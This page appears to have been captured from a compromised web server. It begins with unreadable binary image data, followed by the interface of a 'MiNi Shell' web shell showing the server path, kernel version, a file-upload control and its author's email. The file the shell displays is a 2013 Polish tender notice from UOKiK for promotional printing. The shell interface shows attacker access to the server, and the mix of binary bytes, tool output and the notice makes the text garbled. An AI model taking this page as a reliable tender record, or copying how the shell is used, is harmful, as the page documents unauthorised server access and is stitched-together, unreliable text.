JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130130/40938-N-2013.html

<p class="kh_header"><b>Warszawa: Przetarg nieograniczony na druk i dostawę materiałów promocyjnych dla Urzędu Ochrony Konkurencji i Konsumentów</b><br>
<b>Numer ogłoszenia: 40938 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na druk i dostawę materiałów promocyjnych dla Urzędu Ochrony Konkurencji i Konsumentów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I Zamówienie obejmuje wykonanie projektów graficznych (za wyjątkiem notesu), druk oraz dostawę:

Wykonanie teczek na dokumenty, wizualizacja teczki stanowi Załącznik Nr 1 do SIWZ
Ilość: 500 sztuk
Z dwoma skrzydełkami, z nacięciem do włożenia wizytówki
Format: 220x315 mm po rozłożeniu
Papier kreda 350g, kolorystyka 2+1, logo UOKiK tłoczone na przedzie teczki
Folia matowa jednostronnie na zewnętrznej stronie teczki
Lakier offset w wewnętrznej stronie teczki
Sztancowane z wykrojnika, brak klejeń
Teczka bigowana, dostarczona w formie złożonej

Wykonanie notesu, wizualizacja notesu stanowi Załącznik Nr 1 do SIWZ
Ilość: 1000 sztuk
Format: A5
Środek: papier offset 90g, 24 kartek w kratkę, bloczek klejony po dłuższym boku, 
2+0 (cmyk)
Wymiary: szer. 148mm, wys. 210mm
Przednia okładka: papier kreda matowa 300g, folia matowa jednostronnie, 2+0
Tylnia okładka karton 300g

Wykonanie żetonu metalowego z karabińczykiem
Ilość: 1000 szt.
Wielkość żetonu: 2 zł . 1 euro wykonany z metalu
Metalowy karabińczyk
Nadruk jednostronny (pantone 296C) wykonany na naklejce epoksydowej i przyklejony na żeton

Wykonanie smyczy
Ilość: 1000 sztuk
Kolor: granatowy (pantone 296C)
Typ: taśma poliestrowa 
Długość taśmy: 90 cm 
Szerokość: 15mm
Nadruk:1+1 (biały)
Rodzaj nadruku: sublimacyjny
Karabińczyk: metalowy

Termin realizacji: 10 dni roboczych 
W dniu podpisania umowy Wykonawca otrzyma logotyp UOKiK, wizualizację teczki, żetonu, smyczy, oraz wzór i pliki produkcyjne notesu, wg których należy wykonać zamawiane materiały promocyjne.
W projektach należy użyć czcionkę Trebuchet. 
Przed skierowaniem materiałów do nadruku, konieczne jest uzyskanie akceptacji Zamawiającego dla przedstawionego projektu.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy).
Wraz z dostawą materiałów promocyjnych Wykonawca zobowiązany jest zwrócić płytę CD oraz pliki produkcyjne

Część II Zamówienie obejmuje wykonanie projektów graficznych, nadruk oraz dostawę:
Wykonanie nadruku na koszulkach typu t-shirt zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 25 sztuk w następujących rozmiarach:
S - 5, M - 8, L - 7, XL - 5
Skład: 100 proc. bawełny o gramaturze minimum 180g/m2 maksimum 185g.m2
Wygląd: koszulka z krótkim rękawem i okrągłym elastycznym ściągaczem na szyi.
Kolor: granatowy
Opakowanie: jednostkowe w folię
Nadruk: jeden jednokolorowy (biały) 
Rodzaj nadruku: folia flex

Wykonanie nadruku na koszulkach typu t-shirt zgodnie z wizualizacją stanowiącą Załącznik  Nr 1 do SIWZ
Ilość: 25 sztuk w następujących rozmiarach:
S - 5 , M - 8, L - 7, XL - 5
Skład: 100 proc. bawełny o gramaturze minimum 180g.m2 maksimum 185g/m2
Wygląd: koszulka z krótkim rękawem i okrągłym elastycznym ściągaczem na szyi.
Kolor: granatowy
Opakowanie: jednostkowe w folię
Nadruki: dwa jednokolorowe (białe) 
Rodzaj nadruku: folia flex

Wykonanie nadruku na torbach na laptopa wzór torby stanowi Załącznik Nr 1 do SIWZ
Ilość: 75 sztuk
Kolor: czarny z dwoma szarymi wstawkami na krótszych bokach
Materiał: Polyester 1000D
Wymiary: 36x28x6,5 cm
Wygląd: torba wyposażona w dwie rączki oraz regulowany pasek na ramię, zasuwana zamkiem błyskawicznym, w środku posiadająca dwie dzielone komory wewnętrzne oraz dodatkową zewnętrzną kieszeń na zamek błyskawiczny.
Ilość nadruków: dwa jednokolorowe (białe)
a. nadruk w górnym prawym rogu logotypu UOKiK
b. nadruk na środku torby napisu czcionką Arial Rouded MT Bold: IX Wielkopolska Olimpiada Wiedzy Konsumenckiej
Rodzaj nadruku: termotransfer

Termin realizacji: 10 dni roboczych od podpisania umowy.
W dniu podpisania umowy Zamawiający przekaże Wykonawcy logotyp Zamawiającego na adres e-mail wskazany przez Wykonawcę.
Przed skierowaniem materiałów do nadruku, konieczne jest uzyskanie akceptacji Zamawiającego dla przedstawionego projektu ze sposobem naniesienia nadruku.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy).
Warunkiem udziału w postępowaniu jest złożenie wraz z ofertą wzoru torby na laptopa (bez nadruków) oraz wzoru koszulki wskazanych w opisie przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej jedno zamówienie odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ (nadruk na materiałach promocyjnych)               o wartości nie mniejszej niż: 3 000,00 zł brutto. Wykonawca musi potwierdzić ich należyte wykonanie, poprzez przedstawienie odpowiednich dokumentów wystawionych przez zamawiającego lub odbiorcę dostawy.
Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi
wynikać z jednostkowej umowy) - Załącznik Nr 4 do SIWZ (Wykaz wykonanych podobnych zamówień dla części I), Załącznik Nr 5 do SIWZ (Wykaz wykonanych podobnych zamówień dla części II).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dotyczyć mogą następujących kwestii:

a) osoby uprawnionej do kontaktu lub podpisania protokołu odbioru ze strony        Zamawiającego lub Wykonawcy.
Zmiana dokonana zostanie w przypadku zaistnienia okoliczności faktycznie obiektywnych, które uniemożliwiać będą konkretnej osobie wskazanej w umowie do realizacji jej postanowień, np.: rozwiązanie umowy o pracę, choroba, śmierć pracownika, utrata uprawnień, itp., 
b) stawki podatku VAT, zgodnie w powszechnie obowiązującymi przepisami prawa                      z uwzględnieniem zmiany w całościowym wynagrodzeniu Wykonawcy.
Zmiana dokonana zostanie w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie rozliczeń podatkowych i obowiązujących stawek podatku VAT mających związek z niniejszym przedmiotem zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Ochrony Konkurencji i Konsumentów
Pl. Powstańców Warszawy 1
00-950 Warszawa,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 10:00, miejsce: Urząd Ochrony Konkurencji i Konsumentów
Pl. Powstańców Warszawy 1
00-950 Warszawa, kancelaria 116 (piętro I).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie do siedziby UOKiK materiałów promocyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie teczek na dokumenty, wizualizacja teczki stanowi Załącznik Nr 1 do SIWZ
Ilość: 500 sztuk
Z dwoma skrzydełkami, z nacięciem do włożenia wizytówki
Format: 220x315 mm po rozłożeniu
Papier kreda 350g, kolorystyka 2+1, logo UOKiK tłoczone na przedzie teczki
Folia matowa jednostronnie na zewnętrznej stronie teczki
Lakier offset w wewnętrznej stronie teczki
Sztancowane z wykrojnika, brak klejeń
Teczka bigowana, dostarczona w formie złożonej

Wykonanie notesu, wizualizacja notesu stanowi Załącznik Nr 1 do SIWZ
Ilość: 1000 sztuk
Format: A5
Środek: papier offset 90g, 24 kartek w kratkę, bloczek klejony po dłuższym boku, 
2+0 (cmyk)
Wymiary: szer. 148mm, wys. 210mm
Przednia okładka: papier kreda matowa 300g, folia matowa jednostronnie, 2+0
Tylnia okładka karton 300g

Wykonanie żetonu metalowego z karabińczykiem
Ilość: 1000 szt.
Wielkość żetonu: 2 zł . 1 euro wykonany z metalu
Metalowy karabińczyk
Nadruk jednostronny (pantone 296C) wykonany na naklejce epoksydowej i przyklejony na żeton

Wykonanie smyczy
Ilość: 1000 sztuk
Kolor: granatowy (pantone 296C)
Typ: taśma poliestrowa 
Długość taśmy: 90 cm 
Szerokość: 15mm
Nadruk:1+1 (biały)
Rodzaj nadruku: sublimacyjny
Karabińczyk: metalowy

Termin realizacji: 10 dni roboczych 
W dniu podpisania umowy Wykonawca otrzyma logotyp UOKiK, wizualizację teczki, żetonu, smyczy, oraz wzór i pliki produkcyjne notesu, wg których należy wykonać zamawiane materiały promocyjne.
W projektach należy użyć czcionkę Trebuchet. 
Przed skierowaniem materiałów do nadruku, konieczne jest uzyskanie akceptacji Zamawiającego dla przedstawionego projektu.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy).
Wraz z dostawą materiałów promocyjnych Wykonawca zobowiązany jest zwrócić płytę CD oraz pliki produkcyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie do siedziby UOKiK materiałów promocyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie projektów graficznych, nadruk oraz dostawę:
Wykonanie nadruku na koszulkach typu t-shirt zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 25 sztuk w następujących rozmiarach:
S - 5, M - 8, L - 7, XL - 5
Skład: 100 proc. bawełny o gramaturze minimum 180g.m2 maksimum 185g/m2
Wygląd: koszulka z krótkim rękawem i okrągłym elastycznym ściągaczem na szyi.
Kolor: granatowy
Opakowanie: jednostkowe w folię
Nadruk: jeden jednokolorowy (biały) 
Rodzaj nadruku: folia flex

Wykonanie nadruku na koszulkach typu t-shirt zgodnie z wizualizacją stanowiącą Załącznik  Nr 1 do SIWZ
Ilość: 25 sztuk w następujących rozmiarach:
S - 5 , M - 8, L - 7, XL - 5
Skład: 100 proc. bawełny o gramaturze minimum 180g.m2 maksimum 185g/m2
Wygląd: koszulka z krótkim rękawem i okrągłym elastycznym ściągaczem na szyi.
Kolor: granatowy
Opakowanie: jednostkowe w folię
Nadruki: dwa jednokolorowe (białe) 
Rodzaj nadruku: folia flex

Wykonanie nadruku na torbach na laptopa wzór torby stanowi Załącznik Nr 1 do SIWZ
Ilość: 75 sztuk
Kolor: czarny z dwoma szarymi wstawkami na krótszych bokach
Materiał: Polyester 1000D
Wymiary: 36x28x6,5 cm
Wygląd: torba wyposażona w dwie rączki oraz regulowany pasek na ramię, zasuwana zamkiem błyskawicznym, w środku posiadająca dwie dzielone komory wewnętrzne oraz dodatkową zewnętrzną kieszeń na zamek błyskawiczny.
Ilość nadruków: dwa jednokolorowe (białe)
nadruk w górnym prawym rogu logotypu UOKiK
nadruk na środku torby napisu czcionką Arial Rouded MT Bold: IX Wielkopolska Olimpiada Wiedzy Konsumenckiej
Rodzaj nadruku: termotransfer

Termin realizacji: 10 dni roboczych od podpisania umowy.
W dniu podpisania umowy Zamawiający przekaże Wykonawcy logotyp Zamawiającego na adres e-mail wskazany przez Wykonawcę.
Przed skierowaniem materiałów do nadruku, konieczne jest uzyskanie akceptacji Zamawiającego dla przedstawionego projektu ze sposobem naniesienia nadruku.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy).
Warunkiem udziału w postępowaniu jest złożenie wraz z ofertą wzoru torby na laptopa (bez nadruków) oraz wzoru koszulki wskazanych w opisie przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość koszulki - 5</li>
<li>3. Jakość torby - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com